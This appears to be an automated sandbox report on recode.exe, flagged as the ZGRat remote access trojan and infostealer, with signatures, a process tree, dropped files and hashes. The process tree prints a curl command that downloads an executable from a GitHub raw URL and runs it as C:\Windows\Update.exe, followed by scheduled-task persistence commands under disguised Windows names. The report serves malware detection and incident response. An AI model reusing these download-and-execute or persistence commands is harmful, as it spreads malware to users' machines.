Overview

overview

10

Static

static

3

recode.exe

windows10-1703-x64

1

recode.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 19:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    recode.exe

  • Size

    1.4MB

  • MD5

    bdd59ba7267f819a41854a3f16d24259

  • SHA1

    4f31c541d2d37b0f7124c47bf2345a2dfd772bc4

  • SHA256

    7cd158131b672caa78fc1e4446e0b328f8fbe9a7900a71cca55e778a1596801a

  • SHA512

    2f18823e6e049cfb77dcf8631f938937af339c9faa836131d91aa32fe70c065ee2ae5bebb168dde295753dc39fb42a3b23d29c2994bed8ac5336e0cc7d4972b0

  • SSDEEP

    24576:Fxg7i+ZkpNStkZ2ptmSyzNcMhuoe95bKnMuGKFGR5BXyX1sU:dpNStNkSyJTuoC5mnYFU

Score
10/10
zgratpersistenceratspywarestealer

Malware Config

Signatures

  • Detect ZGRat V1 3 IoCs
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
    persistence
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 12 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\recode.exe
    "C:\Users\Admin\AppData\Local\Temp\recode.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3984
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/Vexigg/Fortnite-External-Source-WIth-Prediction/main/External%20With%20Prediction/build/kdmapper_release.exe --output C:\\Windows\\Update.exe >nul 2>&1 && C:\\Windows\\Update.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/Vexigg/Fortnite-External-Source-WIth-Prediction/main/External%20With%20Prediction/build/kdmapper_release.exe --output C:\\Windows\\Update.exe
        3⤵
        • Drops file in Windows directory
        PID:220
      • C:\Windows\Update.exe
        C:\\Windows\\Update.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\winDll\dvRjBY2gn5BdU0m188kftpzkLyn9BEtcDHYwrpjSKECMFQBg1aJgT7zLqR.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\winDll\CxFFIHB78YecKNtwzXg7GlmZVa2MlUcDrXLO7T7iYWa.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4500
            • C:\winDll\mscom.exe
              "C:\winDll/mscom.exe"
              6⤵
              • Modifies WinLogon for persistence
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1484
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dp2umt34\dp2umt34.cmdline"
                7⤵
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:816
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD86.tmp" "c:\Windows\System32\CSCD2C1EBC8F50242738F1B6E993B132A.TMP"
                  8⤵
                    PID:4056
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GxQLAp5pnT.bat"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4284
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:1940
                    • C:\Windows\system32\PING.EXE
                      ping -n 10 localhost
                      8⤵
                      • Runs ping.exe
                      PID:5020
                    • C:\Windows\TAPI\OfficeClickToRun.exe
                      "C:\Windows\TAPI\OfficeClickToRun.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3780
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\recode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Windows\system32\certutil.exe
            certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\recode.exe" MD5
            3⤵
              PID:5068
            • C:\Windows\system32\find.exe
              find /i /v "md5"
              3⤵
                PID:1868
              • C:\Windows\system32\find.exe
                find /i /v "certutil"
                3⤵
                  PID:4156
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c cls
                2⤵
                  PID:3716
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:5108
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:3064
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:1516
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\RuntimeBroker.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:4988
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\RuntimeBroker.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:1972
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\RuntimeBroker.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:3464
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\OfficeClickToRun.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:396
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\TAPI\OfficeClickToRun.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:2264
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\OfficeClickToRun.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:4564
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\sihost.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:4760
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\sihost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:4900
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\sihost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:940
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\dllhost.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:3372
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\dllhost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:1912
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\dllhost.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:1100
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "mscomm" /sc MINUTE /mo 14 /tr "'C:\winDll\mscom.exe'" /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:3452
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "mscom" /sc ONLOGON /tr "'C:\winDll\mscom.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:4512
              • C:\Windows\system32\schtasks.exe
                schtasks.exe /create /tn "mscomm" /sc MINUTE /mo 11 /tr "'C:\winDll\mscom.exe'" /rl HIGHEST /f
                1⤵
                • Process spawned unexpected child process
                • Creates scheduled task(s)
                PID:4504

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\GxQLAp5pnT.bat
                Filesize

                164B

                MD5

                90a697145204a6c1a485e1534bba7b43

                SHA1

                85ed8e4ac65be045bf129598d7b4ddd743067dd0

                SHA256

                8e746d880e5f2bcf5d0afeba91931b57bb65b12e00826686bb6bdf6070aa1704

                SHA512

                2a160181b6d4f3bf612a509593e64d587f54c6b57627b40488e03d959928a1045dad02345c5c4d64f22d390c10f38109f1322b4663c91b3e52e452c38dc02b95

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\RESAD86.tmp
                Filesize

                1KB

                MD5

                cb36437d5ee571114bb6c3b2f8e47e35

                SHA1

                5e7a8b8894e5991b6434abef28d97f8a93283200

                SHA256

                57fe89bc568b2a4b1b003706b287f4d0234ed52bf1ff84ddc049a8aec1e77cf2

                SHA512

                bed92fc666c20ad33d0b2c01ac3794db53edaab44cc4339e3d2fb67931b05415d12083a52bb83da45a5780f5a8ee6259e6722884030b4615f7a566468941d2b7

                Download Submit

              • C:\Windows\Update.exe
                Filesize

                2.1MB

                MD5

                72231a8ed8d833a291feb278d86bc798

                SHA1

                18315e4aa31384696304b95f88a7ea87f7601d6e

                SHA256

                792d3970408d1f8cac7ddc3bc58975c6c849a1c3a29369ecf5b7c9f3fd722367

                SHA512

                5c79cc6e7dc2495d5dd1eee0219b6aa69cf70be524038fa612c616c5fd699c4b52323bc8808d0339fa642e85296654beecfc7b619882b0d626561ec95e3a548f

                Download Submit

              • C:\winDll\CxFFIHB78YecKNtwzXg7GlmZVa2MlUcDrXLO7T7iYWa.bat
                Filesize

                56B

                MD5

                4339221fd2a51e9f92858fac8115dee5

                SHA1

                c21911039b8ba8e070f6b0c00c4933b8a6851fd6

                SHA256

                c21249336067cb7e84f727efe271e6dea9d98b3bcaf27a4e84e5ef84e8b572fd

                SHA512

                8bda1b257391b97b7d53ea212883bae7276ed69448afcbd193ebf70e0a9a125e7949b51b56e6b63ae6d6c446a1dff60d2a51c797ebc0f74614f239aaf0ffd6f2

                Download Submit

              • C:\winDll\dvRjBY2gn5BdU0m188kftpzkLyn9BEtcDHYwrpjSKECMFQBg1aJgT7zLqR.vbe
                Filesize

                228B

                MD5

                afa6698f846bdab7fb1deac4298a858b

                SHA1

                5f6e916dadacf1596e9c70b0a05c21f1443c60cd

                SHA256

                a31c4cf2ffd97fbca535f31d8c21c945f97390e636f1123ba501ded6f36e5294

                SHA512

                d5ad0be67740b61bb006118636d94882979a6171bcae97397e4b796451be23a531adc64eb67a333b53da45d87bf997327f6d253db1698a6d8dcc1029c330c51d

                Download Submit

              • C:\winDll\mscom.exe
                Filesize

                1.8MB

                MD5

                818c63bcb9ed71f7d2824d691a0a7973

                SHA1

                35c0e698cf9d64d3553977b9f08054edf8669715

                SHA256

                0d2cd06f09ff7b28399b4544a2f63eda91321a2aaf514d5b5bc17d2d01c633b4

                SHA512

                adff7147b442bd6061f55d198137f1123c3c5e6de4a27faccd401028433626a164fe99aa2835ca45542dc6d6dc63a405e2b27aba120033446eb75328d7974f10

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\dp2umt34\dp2umt34.0.cs
                Filesize

                364B

                MD5

                9c5036ba575ca79258aff12112847331

                SHA1

                a007f7eac6819ed211fdf1a91edb0253b9a7f2e1

                SHA256

                98db933bbc57b15ba00e73d17adf542ee083a6cc036c2a3e5ca45e9ef2eeddf2

                SHA512

                356d75e9bf28b99494caf47b5b3525c0ae55dd3ee3650ebd4ef88650e722f50e851d6df51e638e2f07cb876ca29df2d8b503ea10f77c342a2dc4fc5e9ce3a321

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\dp2umt34\dp2umt34.cmdline
                Filesize

                235B

                MD5

                03e42fbf2e425f4ea9b87977020d3738

                SHA1

                8397dc2426997c1f9e23d47da9e3e02109085503

                SHA256

                75d399461d01a2fa97b94f0d681382a96d743f87f97691558f1981d77db48ef9

                SHA512

                9be04314e9547f2b6754218c989f8de4b58f6e65fd89818d80605bfd00bfdc1bdc5d7ff324f4ec56d2aedd0fabfed776a1527949fa1aecc91cd9fa7f03b893d4

                Download Submit

              • \??\c:\Windows\System32\CSCD2C1EBC8F50242738F1B6E993B132A.TMP
                Filesize

                1KB

                MD5

                913b41bbe173c6878eae5b8d8b62f5b7

                SHA1

                386047df3df2b03e486bc87c4b7a3fee5f68ad73

                SHA256

                24e424d4d217bc9b5e76e0867e2715aabb09d7e49ab1e716eefb40d718e4f135

                SHA512

                c71d73ccf422818dce69b867726b04c54b6418b99d67227e7dc328c3c3df86f0235630feb91494f8102540aa94fce68674707db991222ce4c79934c17b9c0cc9

                Download Submit

              • memory/1484-23-0x0000000002740000-0x0000000002758000-memory.dmp

                Filesize

                96KB

                Download

              • memory/1484-21-0x000000001B1B0000-0x000000001B200000-memory.dmp

                Filesize

                320KB

                Download

              • memory/1484-20-0x0000000002720000-0x000000000273C000-memory.dmp

                Filesize

                112KB

                Download

              • memory/1484-18-0x00000000025E0000-0x00000000025EE000-memory.dmp

                Filesize

                56KB

                Download

              • memory/1484-16-0x0000000000300000-0x00000000004D2000-memory.dmp

                Filesize

                1.8MB

                Download

              • memory/3780-59-0x0000000002CA0000-0x0000000002CA8000-memory.dmp

                Filesize

                32KB

                Download